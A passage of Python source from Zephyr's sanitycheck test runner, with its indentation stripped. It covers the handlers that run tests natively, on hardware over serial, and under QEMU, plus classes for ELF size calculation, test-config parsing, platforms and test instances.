self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, device):
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, device):
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance.platform.name):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance.platform.name)
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if not out_state:
out_state = "timeout"
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
os.unlink(pid_fn)
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
proc.wait()
self.returncode = proc.returncode
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_area",
"_k_timer_area",
"_k_mem_slab_area",
"_k_mem_pool_area",
"sw_isr_table",
"_k_sem_area",
"_k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"_k_stack_area",
"_k_msgq_area",
"_k_mbox_area",
"_k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"_k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"object_access",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"_settings_handlers_area",
"_bt_channels_area",
"_bt_br_channels_area",
"_bt_services_area",
"vectors",
"net_socket_register",
"net_ppp_proto"
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class TestCase(object):
"""Class representing a test application
"""
def __init__(self):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
@param tc_dict Dictionary with test values for this test case
from the testcase.yaml file
"""
self.id = ""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = ""
self.type = None
self.tags = None
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = None
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = None
self.depends_on = None
self.min_flash = None
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join({match.decode() for match in achtung_matches})
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance:
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixture=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness == 'console':
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
if "fixture" in self.testcase.harness_config:
fixture_cfg = self.testcase.harness_config['fixture']
if fixture_cfg in fixture:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
